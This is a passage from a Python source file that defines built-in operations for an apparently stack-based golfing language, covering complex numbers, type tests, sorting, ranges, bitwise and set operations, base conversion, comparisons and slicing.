b: [num.numerify(a) + num.numerify(b) * 1j])], stability=\"alpha\", docs=\"First number plus second number times the imaginary unit.\")\n cput('-j', [], [Case.number2(lambda env, a, b: [num.numerify(a) - num.numerify(b) * 1j])], stability=\"alpha\", docs=\"First number minus second number times the imaginary unit.\")\n cput('*j', [], [Case.value_n2v(lambda e: e * 1j)], stability=\"alpha\", docs=\"Multiply by the imaginary unit. Deeply vectorizes.\")\n cput('/j', [], [Case.value_n2v(lambda e: e * -1j)], stability=\"alpha\", docs=\"Divide by the imaginary unit; equivalently, multiply by -1j. Deeply vectorizes.\")\n cput('\\\\j', [], [Case.value_n2v(lambda e: e.imag + e.real * 1j)], stability=\"alpha\", docs=\"Swap the real and imaginary part. 
Deeply vectorizes.\")\n cput('Conjugate', ['Mj'], [Case.value_n2v(lambda e: e.conjugate())], stability=\"alpha\", docs=\"Negate the imaginary part. Deeply vectorizes.\")\n cput('Negate_real', ['|j'], [Case.value_n2v(lambda e: -e.conjugate())], stability=\"unstable\", docs=\"Negate the real part. Deeply vectorizes. Mnemonic: reflect this across the vertical y-axis on the complex plane. (Really really unstable.)\")\n cput('Imaginary_unit_power', ['^j', 'ˆj'], [Case.value_n2v(lambda e: 1j ** e)], stability=\"unstable\", docs=\"Take the power of the imaginary unit to this number. Deeply vectorizes.\")\n cput('Pure_imaginary', ['&j', '?j'], [Case.value_n2v(lambda e: int(e.real == 0))], stability=\"unstable\", docs=\"Test if the real part is zero. Deeply vectorizes.\")\n cput('Not_imaginary', ['!j'], [Case.value_n2v(lambda e: int(e.imag == 0))], stability=\"unstable\", docs=\"Test if the imaginary part is zero. Deeply vectorizes.\")\n\n peekdo_case = Case.block(lambda env, body: pd_do_then_empty_list(env, body, peek=True))\n iterate_case = Case.block(lambda env, body: [pd_iterate(env, body)[0]])\n fixed_point_case = Case.block(lambda env, body: [pd_iterate(env, body)[1]])\n\n cput('Peekdo', [], [peekdo_case],\n docs=\"\"\"Like {{ 'Doloop'|b }} except the condition is peeked\n instead of popped.\"\"\",\n stability=\"beta\",\n golf_aliases=['D'])\n cput('Fixed_point', [], [fixed_point_case],\n docs=\"\"\"Iterate a block, peeking at the stack between iterations,\n until a value repeats. Pushes that value. (This is more general\n than a \"fixed point\" as usually defined since it doesn't require a\n value to repeat after just one iteration.)\"\"\",\n stability=\"alpha\",\n golf_aliases=['F'])\n cput('Iterate', [], [iterate_case],\n docs=\"\"\"Iterate a block, peeking at the stack between iterations,\n until a value repeats. Pushes all values peeked until (excluding)\n the repeated value.\"\"\",\n stability=\"unstable\",\n golf_aliases=['I'])\n\n cput('To_char_or_peekloop', ['C'], [to_char_case, peekdo_case],\n docs=\"\"\"On a non-block value, {{ 'To_char'|b }}; on a block,\n {{ 'Peekdo'|b }}. 
Mnemonic: \"C\" is right next to \"D\" and it's a\n homophone of \"see\", which is a synonym of \"peek\".\"\"\",\n stability=\"alpha\")\n\n cput('To_float_or_fixed_point', ['F'], [to_float_case, fixed_point_case],\n docs=\"\"\"On a non-block value, {{ 'To_float'|b }}; on a block,\n {{ 'Fixed_point'|b }}.\"\"\",\n stability=\"beta\")\n cput('To_int_or_iterate', ['I'], [to_int_case, iterate_case],\n docs=\"\"\"On a non-block value, {{ 'To_float'|b }}; on a block,\n {{ 'Iterate'|b }}.\"\"\",\n stability=\"beta\")\n\n cput('Int_groups', ['Ig'], [Case.str_(lambda env, x: [[int(m) for m in re.findall(r\"-?\\d+\", x)]])],\n docs=\"Finds integer-looking parts of a string and converts them to integers.\",\n stability=\"alpha\")\n cput('Float_groups', ['Fg'], [Case.str_(lambda env, x: [[float(m) for m in re.findall(r\"-?\\d+(?:\\.\\d+)?(?:e\\d+)?|\\.\\d+(?:e\\d+)?\", x)]])],\n docs=\"Finds float-looking parts of a string and converts them to floats.\",\n stability=\"alpha\")\n # }}}\n # Type predicates {{{\n cput('Is_int', [':i'], [\n Case.any(lambda env, x: [int(isinstance(x, int))]),\n ], docs=\"Test if integer\", stability=\"alpha\")\n cput('Is_char', [':c'], [\n Case.any(lambda env, x: [int(isinstance(x, Char))]),\n ], docs=\"Test if Char\", stability=\"alpha\")\n cput('Is_float', [':f'], [\n Case.any(lambda env, x: [int(isinstance(x, float))]),\n ], docs=\"Test if float\", stability=\"alpha\")\n cput('Is_complex', [':j'], [\n Case.any(lambda env, x: [int(isinstance(x, complex))]),\n ], docs=\"Test if complex\", stability=\"alpha\")\n cput('Is_number', [':n'], [\n Case.any(lambda env, x: [int(isinstance(x, (Char, int, float, complex)))]),\n ], docs=\"Test if number (char, int, float, complex)\", stability=\"alpha\")\n cput('Is_string', [':s'], [\n Case.any(lambda env, x: [int(isinstance(x, str))]),\n ], docs=\"Test if string\", stability=\"alpha\")\n cput('Is_array', [':a'], [\n Case.any(lambda env, x: [int(isinstance(x, (list, range)))]),\n ], docs=\"Test if array (or range)\", stability=\"alpha\")\n cput('Is_block', [':b'], [\n Case.any(lambda env, x: [int(isinstance(x, Block))]),\n ], docs=\"Test if block\", stability=\"alpha\")\n cput('Is_hoard', [':h'], [\n Case.any(lambda env, x: [int(isinstance(x, Hoard))]),\n ], docs=\"Test if hoard\", stability=\"alpha\")\n # }}}\n # Sort, $; test for sortedness; order_statistic {{{\n cput('Sort', [], [\n Case.seq(lambda env, s: [pd_sort(s)]),\n Case.block_seq_range(lambda env, f, s: [pd_sort(s, (env, f))]),\n ], docs=\"Sort\", stability=\"stable\", golf_aliases=['$'])\n cput('Sort_or_stack_select', ['$'], [\n Case.number(lambda env, n: [env.index_stack(num.intify(n))]),\n Case.seq(lambda env, s: [pd_sort(s)]),\n Case.block_seq_range(lambda env, f, s: [pd_sort(s, (env, f))]),\n ], docs=\"Sort or select from stack\", stability=\"beta\")\n cput('Order_statistic', ['¢'], [\n Case.list_number(lambda env, x, i: [pd_to_sorted(x)[num.intify(i)]]),\n Case.str_number(lambda env, s, i: [Char(sorted(s)[num.intify(i)])]),\n ], docs=\"Order statistic (zero-indexed)\", stability=\"alpha\")\n cput('Is_sorted', ['$p'], [\n Case.seq(lambda env, s: [int(all(pd_lte(a, b) for a, b in pd_zip_with_tail(s)))]),\n ], docs=\"Test if sorted\", stability=\"beta\")\n cput('Is_strictly_increasing', ['p'], [\n Case.seq(lambda env, s: [int(all(pd_less_than(b, a) for a, b in pd_zip_with_tail(s)))]),\n ], docs=\"Test if strictly decreasing\", stability=\"beta\")\n # }}}\n # Range/enumerate/flatten; Comma, J {{{\n range_case = Case.number(lambda env, n: [range(num.intify(n))])\n 
cput('Range', [], [range_case],\n docs=\"Range (half-open from 0).\", stability=\"beta\",\n golf_aliases=[','])\n range_one_case = Case.number(lambda env, n: [range(1, num.intify(n) + 1)])\n cput('Range_one', [], [range_one_case],\n docs=\"Range, inclusive from 1. \", stability=\"beta\",\n golf_aliases=['J'])\n\n enumerate_case = Case.seq(lambda env, seq: [pd_enumerate(seq)])\n cput('Enumerate', [], [enumerate_case],\n docs=\"Zip with indices from 0.\", stability=\"beta\",\n golf_aliases=[','])\n enumerate_one_case = Case.seq(lambda env, seq: [pd_enumerate(seq, start=1)])\n cput('Enumerate_one', [], [enumerate_one_case],\n docs=\"Zip with indices from 1.\", stability=\"beta\",\n golf_aliases=['J'])\n filter_indexes_case = Case.block_seq_range(lambda env, block, seq: [pd_filter_indexes(env, block, seq)])\n cput('Filter_indexes', [], [filter_indexes_case],\n docs=\"List indices at which block is true. Short: {{ ','|b }}\", stability=\"beta\",\n golf_aliases=[','])\n\n cput('Range_enumerate_or_filter_indices', [','], [\n range_case,\n enumerate_case,\n filter_indexes_case,\n ],\n docs=\"\"\"Range on numbers. Enumerate (zip with indices from 0) on\n sequences. On block and sequence, list indices at which block is\n true.\n\n Compare {{ 'Range_enumerate_one_or_reject_indices'|b }}.\n \"\"\", stability=\"beta\")\n\n cput('Range_len_keep', ['´'], [\n Case.number(lambda env, n: [n, range(num.intify(n))]),\n Case.seq(lambda env, seq: [seq, range(len(seq))]),\n ],\n docs=\"\"\"Range on numbers; range of indices of sequence. Keeps the\n operand on the stack! Mnemonic: looks like a comma, except it's\n higher, so the stack will be taller after running it.\"\"\",\n stability=\"unstable\")\n\n cput('Range_enumerate_one_or_reject_indices', ['J'], [\n range_one_case,\n enumerate_one_case,\n Case.block_seq_range(lambda env, block, seq: [pd_filter_indexes(env, block, seq, negate=True)]),\n ],\n docs=\"\"\"Range, inclusive from 1, on numbers. Enumerate from 1 (zip\n with indices from 1) on sequences. On block and sequence, list\n indices at which block is false. Mnemonic: the letter J looks like\n a big comma.\n\n Compare {{ 'Range_enumerate_or_filter_indices'|b }}.\n \"\"\", stability=\"beta\")\n\n range_til_case = Case.number2(lambda env, lo, hi: [range(num.intify(lo), num.intify(hi))])\n range_to_case = Case.number2(lambda env, lo, hi: [range(num.intify(lo), num.intify(hi) + 1)])\n cput('Exclusive_range', ['Tl'], [range_til_case],\n stability=\"beta\")\n cput('Inclusive_range', ['To'], [range_to_case],\n stability=\"beta\")\n flatten_once_case = Case.seq(lambda env, seq: [pd_flatten_once(seq)])\n flatten_case = Case.seq(lambda env, seq: [pd_flatten(seq)])\n cput('Flatten_once', ['Fo'], [flatten_once_case],\n stability=\"beta\")\n cput('Flatten', ['Fl'], [flatten_case],\n stability=\"beta\")\n # Note: The dots are the opposite convention of Ruby, where .. is inclusive\n # and ... is exclusive. I don't particularly like that convention. 
The\n # three-dot range having one more element than the two-dot range makes\n # sense to me.\n cput('Exclusive_range_or_flatten_once', ['¨'], [flatten_once_case, range_til_case],\n stability=\"beta\")\n cput('Inclusive_range_or_flatten', ['…'], [flatten_case, range_to_case],\n stability=\"beta\")\n\n cput('Range_one_down', ['Dj'], [\n Case.number(lambda env, n: [range(num.intify(n), 0, -1)])\n ],\n docs=\"Range, inclusive downward from 1\", stability=\"alpha\")\n cput('Range_odds_exclusive', ['Or'], [\n Case.number(lambda env, n: [range(1, num.intify(n), 2)])\n ],\n docs=\"Range, odds, from 1, exclusive\", stability=\"unstable\")\n cput('Range_evens_exclusive', ['Er'], [\n Case.number(lambda env, n: [range(0, num.intify(n), 2)])\n ],\n docs=\"Range, evens, from 0, exclusive\", stability=\"unstable\")\n # cput('Range_odds_inclusive', ['Oj'], [\n # Case.number(lambda env, n: [range(1, num.intify(n) + 1, 2)])\n # ],\n # docs=\"Range, odds, from 1, inclusive\", stability=\"unstable\")\n # cput('Range_evens_inclusive', ['Ej'], [\n # Case.number(lambda env, n: [range(2, num.intify(n) + 1, 2)])\n # ],\n # docs=\"Range, evens, from 2, inclusive\", stability=\"unstable\")\n # }}}\n # Binary operators &|^ {{{\n cput('Bin_or_or_union_or_unless', ['|'], [\n Case.number2(lambda env, a, b: [num.pd_or(a, b)]),\n Case.seq2_range(lambda env, a, b: [pd_seq_union(a, b)]),\n Case.condition_block(lambda env, cond, block:\n pd_if_then_empty_list(env, cond, block, negate=True)),\n ],\n docs=\"\"\"Binary OR on numbers. Union on sequences. One-branch unless\n on blocks.\"\"\", stability=\"beta\")\n cput('Bin_and_or_intersection_or_if', ['&'], [\n Case.number2(lambda env, a, b: [num.pd_and(a, b)]),\n Case.seq2_range(lambda env, a, b: [pd_seq_intersection(a, b)]),\n Case.condition_block(lambda env, cond, block:\n pd_if_then_empty_list(env, cond, block)),\n ],\n docs=\"\"\"Binary AND on numbers. Intersection on sequences.\n One-branch if on blocks.\"\"\", stability=\"beta\")\n cput('Exclusive_or_or_symmetric_difference_or_find_last', ['^'], [\n Case.number2(lambda env, a, b: [num.pd_xor(a, b)]),\n Case.seq2_range(lambda env, a, b: [pd_seq_symmetric_difference(a, b)]),\n Case.block_seq_range(lambda env, block, seq:\n [second_or_error(pd_find_last_entry(env, block, seq),\n \"Entry not found in Exclusive_or_or_symmetric_difference_or_find_last\")]),\n ],\n docs=\"\"\"Binary XOR on numbers. Symmetric difference on sequences.\n Find last on block and sequence.\n \"\"\", stability=\"beta\")\n cput('Boolean_and', ['&p'], [\n Case.value2(lambda env, a, b: [b if a else a]),\n ],\n docs=\"\"\"Takes two arguments, leaves the first if the first is\n truthy and the second if the first is falsy.\"\"\",\n stability=\"beta\")\n cput('Boolean_or', ['|p'], [\n Case.value2(lambda env, a, b: [a if a else b]),\n ],\n docs=\"\"\"Takes two arguments, leaves the first if the first is\n falsy and the second if the first is truthy.\"\"\",\n stability=\"beta\")\n cput('If', [], [\n Case.any2(lambda env, cond, body:\n pd_if_then_empty_list(env, cond, body)),\n ],\n docs=\"\"\"Single-branch if.\"\"\", stability=\"alpha\")\n cput('Unless', ['Ul'], [\n Case.any2(lambda env, cond, body:\n pd_if_then_empty_list(env, cond, body, negate=True)),\n ],\n docs=\"\"\"Single-branch unless.\"\"\", stability=\"alpha\")\n @put('If_else', '?',\n docs=\"\"\"If-else.\n\n ex: 1 \"True!\" \"False\" ? 
=> \"True!\"\n \"\"\", stability=\"beta\")\n def pd_if(env: Environment) -> None:\n c, b, a = env.pop3()\n if pytruth_eval(env, a):\n # print('True!')\n env.push_or_eval(b)\n else:\n # print('False!')\n env.push_or_eval(c)\n # }}}\n # Base {{{\n base_cases = [\n Case.number2(lambda env, n, b: [base.to_base_digits(num.intify(b), num.intify(n))]),\n Case.list_number(lambda env, lst, b: [base.from_base_digits(num.intify(b), pd_flatten_to_int_generator(lst))]),\n Case.str_number(lambda env, s, b: [int(s, num.intify(b))]),\n ]\n cput('Base', [], base_cases,\n docs=\"\"\"Base. On two numbers, converts the first to a list of\n digits in the radix of the second. On a list or a string and a\n number, interprets the sequence as digits (numbers if a list, digit\n characters if a string) in the radix of the number and converts to\n a number.\"\"\", stability=\"beta\",\n golf_aliases=['B'])\n product_map_case = Case.seq2_range_block(lambda env, seq1, seq2, block:\n [pd_map_cartesian_product(env, block, seq1, seq2, flat=True)])\n cput('Product_map', [], [product_map_case],\n docs=\"\"\"Map over the Cartesian product of two sequences, resulting\n in a list.\"\"\", stability=\"alpha\",\n golf_aliases=['B'])\n cput('Base_or_product_map', ['B'], base_cases + [product_map_case],\n docs=\"\"\"{{ 'Base'|b }} or {{ 'Product_map'|b }} (mnemonic: Bi-map,\n mapping over two things at once. Note that the result is a\n single-level list of results; for a \"table\" or a list of lists, see\n {{ 'T'|b }}.\"\"\",\n stability=\"beta\")\n cput('Lower_base', ['Lb'], [\n Case.value_number(lambda env, v, b: [pd_deepmap_n2v(\n lambda e: base.to_base_digits_lower(\n num.intify(b), num.intify(e)), v)]),\n ],\n docs=\"\"\"Converts the first number to a string of digits in the\n radix of the second, using lowercase digits. Deeply vectorizes over\n the first.\"\"\", stability=\"beta\")\n cput('Upper_base', ['Ub'], [\n Case.value_number(lambda env, v, b: [pd_deepmap_n2v(\n lambda e: base.to_base_digits_upper(\n num.intify(b), num.intify(e)), v)]),\n ],\n docs=\"\"\"Converts the first number to a string of digits in the\n radix of the second, using uppercase digits. Deeply vectorizes over\n the first.\"\"\", stability=\"beta\")\n cput('Bin_string', ['Bs'], [\n Case.value_n2v(lambda e: base.to_base_digits_upper(2, num.intify(e))),\n ],\n docs=\"\"\"Converts numbers to their binary representation as a\n string. Deeply vectorizes.\"\"\", stability=\"beta\")\n cput('Hex_string', ['Hs'], [\n Case.value_n2v(lambda e: base.to_base_digits_upper(16, num.intify(e))),\n ],\n docs=\"\"\"Converts numbers to their hexadecimal representation as a\n string. Deeply vectorizes.\"\"\", stability=\"beta\")\n cput('Digit_sum', ['Dr'], [\n Case.value_n2v(lambda e: sum(base.to_base_digits(10, num.intify(e)))),\n ],\n docs=\"\"\"Digit sum of integers. Deeply vectorizes. 
Mnemonic: r for\n reduce as always, since this is a reduction over the digits, and\n probably the most natural one.\"\"\",\n stability=\"alpha\")\n # }}}\n # Comparators <=> Max Min {{{\n cput('Equal', ['Eq'], [\n Case.number2(lambda env, a, b: [int(num.numerify(a) == num.numerify(b))]),\n Case.str2(lambda env, a, b: [int(a == b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) == pd_to_list(b))]),\n ],\n docs=\"Test for value equality.\",\n stability=\"beta\")\n cput('Equal_identity', ['Is'], [\n Case.number2(lambda env, a, b: [int(a is b)]),\n ],\n docs=\"Test for Python identity (is)\",\n stability=\"alpha\")\n cput('Equal_or_index_or_find', ['='], [\n Case.number2(lambda env, a, b: [int(num.numerify(a) == num.numerify(b))]),\n Case.hoard_immutable(lambda env, hoard, value: [hoard.index(value)]),\n Case.str2(lambda env, a, b: [int(a == b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) == pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_index(seq, n)]),\n Case.block_seq_range(lambda env, block, seq:\n [second_or_error(pd_find_entry(env, block, seq),\n \"Entry not found in Equal_or_index_or_find\")]),\n ],\n docs=\"\"\"On two numbers, two strings, or two lists, compare for\n equality. On a number and a sequence, index into the sequence. On a\n block and a sequence (numbers coerce to ranges), find the first\n element satisfying the block.\"\"\", stability=\"beta\")\n cput('Lt_or_slice', ['<'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) < 0)]),\n Case.hoard_immutable(lambda env, hoard, value: [hoard.slice(None, pykey(value))]),\n Case.str2(lambda env, a, b: [int(a < b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) < pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, None, n)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_take_drop_while(env, block, pd_deref(seq))[0]]),\n ],\n docs=\"\"\"On two numbers, two strings, or two lists, compare if the\n first is less than the second. On a number and a sequence, slice\n elements with index less than the number, as Python s[:n]. On a\n sequence (numbers coerce to ranges) and a block, \"take while\", or\n return the longest prefix of elements that all satisfy the\n block.\"\"\",\n stability=\"beta\")\n cput('Gt_or_slice', ['>'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) > 0)]),\n Case.hoard_immutable(lambda env, hoard, value: [hoard.slice(pykey(value), None)]),\n Case.str2(lambda env, a, b: [int(a > b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) > pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, n, None)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_take_drop_while(env, block, pd_deref(seq))[1]]),\n ],\n docs=\"\"\"On two numbers, two strings, or two lists, compare if the\n first is greater than the second. On a number and a sequence, slice\n elements with index greater than or equal to the number, as Python\n s[n:]. 
On a sequence (numbers coerce to ranges) and a block, \"drop\n while\", or return the suffix starting with the first element that\n fails to satisfy the block.\"\"\",\n stability=\"beta\")\n cput('Leq_or_slice', ['<e'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) <= 0)]),\n Case.str2(lambda env, a, b: [int(a <= b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) <= pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, None, num.pd_add_const(n, 1))]), # TODO: ?\n ],\n docs=\"\"\"Less than or equal to.\"\"\",\n stability=\"beta\")\n cput('Geq_or_slice', ['>e'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) >= 0)]),\n Case.str2(lambda env, a, b: [int(a >= b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) >= pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_slice(seq, n, None)]), # TODO: ?\n ],\n docs=\"\"\"Greater than or equal to.\"\"\",\n stability=\"beta\")\n cput('Lt_approx', ['<a'], [\n Case.number2(lambda env, a, b:\n [int(num.numerify(a) - num.numerify(b) < env.get_epsilon())]), # type: ignore\n ],\n docs=\"\"\"Approximately less than; tolerance is given by Ep,\n epsilon\"\"\",\n stability=\"alpha\")\n cput('Gt_approx', ['>a'], [\n Case.number2(lambda env, a, b:\n [int(num.numerify(b) - num.numerify(a) < env.get_epsilon())]), # type: ignore\n ],\n docs=\"\"\"Approximately greater than; tolerance is given by Ep,\n epsilon\"\"\",\n stability=\"alpha\")\n cput('Eq_approx', ['=a'], [\n Case.number2(lambda env, a, b:\n [int(abs(num.numerify(a) - num.numerify(b)) < env.get_epsilon())]), # type: ignore\n ],\n docs=\"\"\"Approximately equal to; tolerance is given by Ep,\n epsilon\"\"\",\n stability=\"alpha\")\n cput('Min', ['<m', 'Õ'], [\n Case.value2(lambda env, a, b: [pd_min(a, b)]),\n Case.value2_block(lambda env, a, b, f: [pd_min(a, b, (env, f))]),\n ],\n docs=\"\"\"Minimum of two values, optionally by a block\"\"\",\n stability=\"beta\")\n cput('Max', ['>m', 'Ã'], [\n Case.value2(lambda env, a, b: [pd_max(a, b)]),\n Case.value2_block(lambda env, a, b, f: [pd_max(a, b, (env, f))]),\n ],\n docs=\"\"\"Maximum of two values, optionally by a block\"\"\",\n stability=\"beta\")\n cput('Median_of_three', ['=m'], [\n Case.value3(lambda env, a, b, c: [pd_median_of_three(a, b, c)]),\n Case.value3_block(lambda env, a, b, c, f: [pd_median_of_three(a, b, c, (env, f))]),\n ],\n docs=\"\"\"Median of three values, optionally by a block\"\"\",\n stability=\"alpha\")\n cput('Array_min', ['<r', 'Œ'], [\n Case.seq(lambda env, e: [pd_min_of_seq(e)]),\n Case.block_seq_range(lambda env, f, e: [pd_min_of_seq(e, (env, f))]),\n ],\n docs=\"\"\"Minimum of array, optionally by a block (numbers will\n coerce to ranges if you supply a block). Mnemonic: it's like\n reducing by minimum of two values.\"\"\",\n stability=\"beta\")\n cput('Array_max', ['>r', 'Æ'], [\n Case.seq(lambda env, e: [pd_max_of_seq(e)]),\n Case.block_seq_range(lambda env, f, e: [pd_max_of_seq(e, (env, f))]),\n ],\n docs=\"\"\"Maximum of array, optionally by a block (numbers will\n coerce to ranges if you supply a block). Mnemonic: it's like\n reducing by maximum of two values.\"\"\",\n stability=\"beta\")\n cput('Array_median', ['=r'], [\n # TODO: True median should try to take the average of two elements\n Case.list_(lambda env, x: [pd_to_sorted(x)[len(x)//2]]),\n Case.str_(lambda env, s: [Char(sorted(s)[len(s)//2])]),\n ], docs=\"Median of array\", stability=\"alpha\")\n cput('Compare', ['Co', '˜'], [\n Case.number2(lambda env, a, b: [num.pd_num_cmp(a, b)]),\n Case.str2(lambda env, a, b: [num.any_cmp(a, b)]),\n Case.list2(lambda env, a, b: [num.any_cmp(pd_to_list(a), pd_to_list(b))]),\n ],\n docs=\"\"\"Compare (-1, 0, or 1)\"\"\",\n stability=\"alpha\")\n cput('Array_minima', ['<rs', 'Œs'], [\n Case.seq(lambda env, e: [pd_minima_of_seq(e)]),\n Case.block_seq_range(lambda env, f, e: [pd_minima_of_seq(e, (env, f))]),\n ],\n docs=\"\"\"Minima of array, optionally by a block (numbers will\n coerce to ranges if you supply a block).\"\"\",\n stability=\"alpha\")\n cput('Array_maxima', ['>rs', 'Æs'], [\n Case.seq(lambda env, e: [pd_maxima_of_seq(e)]),\n Case.block_seq_range(lambda env, f, e: [pd_maxima_of_seq(e, (env, f))]),\n ],\n docs=\"\"\"Maxima of array, optionally by a block (numbers will\n coerce to ranges if you supply a block).\"\"\",\n stability=\"alpha\")\n cput('Min_deep_vectorizing', ['<mw', 'Õw'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(pd_min, a, b)]),\n ],\n docs=\"\"\"Minimum of two values; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Max_deep_vectorizing', ['>mw', 'Ãw'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(pd_max, a, b)]),\n ],\n docs=\"\"\"Maximum of two values; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n\n cput('Lt_length', ['<l'], [\n Case.number2_len(lambda env, a, b: [int(num.pd_num_cmp(a, b) < 0)]),\n ],\n docs=\"\"\"Less than, after coercing two arguments to ints or\n floats, sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Gt_length', ['>l'], [\n Case.number2_len(lambda env, a, b: [int(num.pd_num_cmp(a, b) > 0)]),\n ],\n docs=\"\"\"Greater than, after coercing two arguments to ints or\n floats, sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Eq_length', ['=l'], [\n Case.number2_len(lambda env, a, b: [int(a == b)]),\n ],\n docs=\"\"\"Equal to, after coercing two arguments to ints or floats,\n sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Leq_length', ['<el'], [\n Case.number2_len(lambda env, a, b: [int(num.pd_num_cmp(a, b) <= 0)]),\n ],\n docs=\"\"\"Less than or equal to, after coercing two arguments to\n ints or floats, sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Geq_length', ['>el'], [\n Case.number2_len(lambda env, a, b: [int(num.pd_num_cmp(a, b) >= 0)]),\n ],\n docs=\"\"\"Greater than or equal to, after coercing two arguments to\n ints or floats, sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('First_duplicate', ['=g'], [\n Case.seq(lambda env, s: [\n second_or_error(pd_first_duplicate(s),\n \"Duplicate not found in First_duplicate\")]),\n ],\n docs=\"\"\"Find the first element that appears a second time in a\n sequence.\"\"\",\n stability=\"unstable\")\n # }}}\n # Shifting and slicing {{{\n left_shift_case = Case.number2(lambda env, a, b: [num.pd_lshift(a, b)])\n right_shift_case = Case.number2(lambda env, a, b: [num.pd_rshift(a, b)])\n cput('Left_shift', [], [left_shift_case],\n docs=\"\"\"Bitwise left shift\"\"\",\n stability=\"beta\",\n golf_aliases=['<s'])\n cput('Right_shift', [], [right_shift_case],\n docs=\"\"\"Bitwise right shift\"\"\",\n stability=\"beta\",\n golf_aliases=['>s'])\n nonempty_left_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[:n+1] for n in range(len(seq))]])\n nonempty_right_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[n:] for n in range(len(seq) - 1, -1, -1)]])\n from_empty_left_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[:n] for n in range(len(seq) + 1)]])\n from_empty_right_slices_case = Case.seq_deref(\n lambda env, seq: [[seq[n:] for n in range(len(seq), -1, -1)]])\n def nonempty_slices_func(env: Environment, seq: PdImmutableSeq) -> List[PdObject]:\n return [[seq[lo:hi]\n for lo in range(len(seq))\n for hi in range(lo + 1, len(seq) + 1)]]\n nonempty_slices_case = Case.seq_deref(nonempty_slices_func)\n\n cput('Left_slices', [], [nonempty_left_slices_case],\n docs=\"\"\"Left slices (nonempty, by increasing length)\"\"\",\n stability=\"alpha\",\n golf_aliases=['<s'])\n cput('Right_slices', [], [nonempty_right_slices_case],\n docs=\"\"\"Right slices (nonempty, by increasing length)\"\"\",\n stability=\"alpha\",\n golf_aliases=['>s'])\n\n cput('Left_shift_or_slices', ['<s'], [\n nonempty_left_slices_case, left_shift_case,\n ],\n docs=\"\"\"{{ 'Left_shift'|b }} on numbers, {{ 'Left_slices'|b }} on\n a sequence\"\"\",\n stability=\"alpha\")\n cput('Right_shift_or_slices', ['>s'], [\n nonempty_right_slices_case, right_shift_case,\n ],\n docs=\"\"\"{{ 'Right_shift'|b }} on numbers, {{ 'Right_slices'|b }} on\n a sequence\"\"\",\n stability=\"alpha\")\n\n 
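# For orientation (illustrative, read off the comprehensions above): on \"abc\",\n # the left slices are [\"a\" \"ab\" \"abc\"], the right slices are [\"c\" \"bc\" \"abc\"],\n # and the from-empty variants additionally include \"\".\n\n 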
stability=\"alpha\")\n\n cput('From_empty_left_slices', ['«s'], [\n from_empty_left_slices_case,\n ],\n docs=\"\"\"Left slices (including the empty one, by increasing\n length)\"\"\",\n stability=\"alpha\")\n\n cput('From_empty_right_slices', ['»s'], [\n from_empty_right_slices_case,\n ],\n docs=\"\"\"Right slices (including the empty one, by increasing\n length)\"\"\",\n stability=\"alpha\")\n\n nonempty_slices_range_case = Case.seq_range_deref(nonempty_slices_func)\n\n cput('All_slices', ['=s', '§'], [nonempty_slices_range_case],\n docs=\"\"\"All slices of a sequence (numbers coerce to ranges).\"\"\",\n stability=\"unstable\")\n\n cput('Left_cycle', ['c'], [\n Case.str_number(lambda env, seq, n: [seq[-num.intify(n):] + seq[:-num.intify(n)]]),\n Case.list_range_number(lambda env, seq, n: [pd_to_list(pd_slice(seq, -num.intify(n), None)) + pd_to_list(pd_slice(seq, None, -num.intify(n)))]),\n ],\n docs=\"\"\"Right cycle a list or string by some number of elements,\n which are cut off the right and reattached to the left.\"\"\",\n stability=\"unstable\")\n\n cput('Index_cyclically', ['=c'], [\n Case.number_seq(lambda env, n, seq: [pd_index(seq, num.intify(n) % len(seq))]),\n ],\n docs=\"\"\"Index into a list cyclically, by taking the index mod the\n length of the list.\"\"\",\n stability=\"unstable\")\n\n cput('Left_cycle_one', ['o'], [\n Case.str_(lambda env, seq: [seq[-1:] + seq[:-1]]),\n Case.list_int_range(lambda env, seq: [list(seq[-1:]) + list(seq[:-1])]),\n ],\n docs=\"\"\"Right cycle a list or string Once: move the last element to\n the first.\"\"\",\n stability=\"unstable\")\n\n cput('Has_prefix', ['h'], [\n Case.list2_singleton(lambda env, a, b: [int(pd_to_list(a)[-len(b):] == pd_to_list(b))]), # TODO could be optimized\n Case.seq2_singleton(lambda env, a, b: [int(env.pd_str(a).endswith(env.pd_str(b)))]),\n ],\n docs=\"\"\"Test if the first argument has a suffix equal to the second\n argument (numbers coerce to single-element lists; if at least one\n argument is a string, both coerce to strings).\"\"\",\n stability=\"unstable\")\n def has_infix(env: Environment, a: Union[list, range, Hoard], b: Union[list, range, Hoard]) -> List[PdObject]:\n a = pd_to_list(a)\n b = pd_to_list(b)\n return [int(any(a[i:i+len(b)] == b for i in range(len(a) - len(b) + 1)))]\n cput('Has_infix', ['=h'], [\n Case.list2_singleton(has_infix),\n Case.seq2_singleton(lambda env, a, b: [int(env.pd_str(b) in env.pd_str(a))]),\n ],\n docs=\"\"\"Test if the first argument has a substring equal to the\n second argument (numbers coerce 